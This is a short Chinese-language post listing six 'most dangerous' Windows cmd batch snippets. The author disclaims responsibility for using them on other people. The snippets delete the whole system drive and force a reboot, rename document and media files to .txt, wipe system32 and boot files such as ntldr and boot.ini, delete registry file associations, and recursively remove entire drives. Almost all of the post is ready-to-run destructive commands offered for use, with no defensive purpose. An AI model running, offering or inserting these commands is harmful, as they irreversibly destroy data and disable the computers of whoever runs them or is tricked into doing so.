今天我特地上网搜集了六条条最危险的cmd命令,注意!
如果你对其他人使用了这些cmd,本人概不负责。
1.蓝屏死机
@echo off
del %systemdrive%\*.*/f/s/q
shutdown -f -r -t 00
2.更改所有文件后缀名
Ren *.doc *.txt Ren *.jpeg *.txt
Ren *.lnk *.txt
Ren *.avi *.txt
Ren *.mpeg *.txt
Ren *.com *.txt
Ren *.bat *.txt
3.删除system32
Del c:\windows\system32\*.* /q
4.使PC永久崩溃
@echo off
Attrib -r -s -h c:\autoexec.bat
Del c:\autoexec.bat
Attrib -r -s -h c:\boot.ini
Del c:\boot.ini
Attrib -r -s -h c:\ntldr
Del c:\ ntldr
Attrib -r -s -h c:\windows\win.ini
Del c:\windows\win.ini
5.删除所有注册表
@echo off
start reg delete HKCR/.exe
start reg delete HKCR/.dll
start reg delete HKCR/*
6.格式化硬盘
rd/s/q D:\
rd/s/q C:\
rd/s/q E:\
再次声明,如果你使用这些命令造成了后果,本人一律不负责。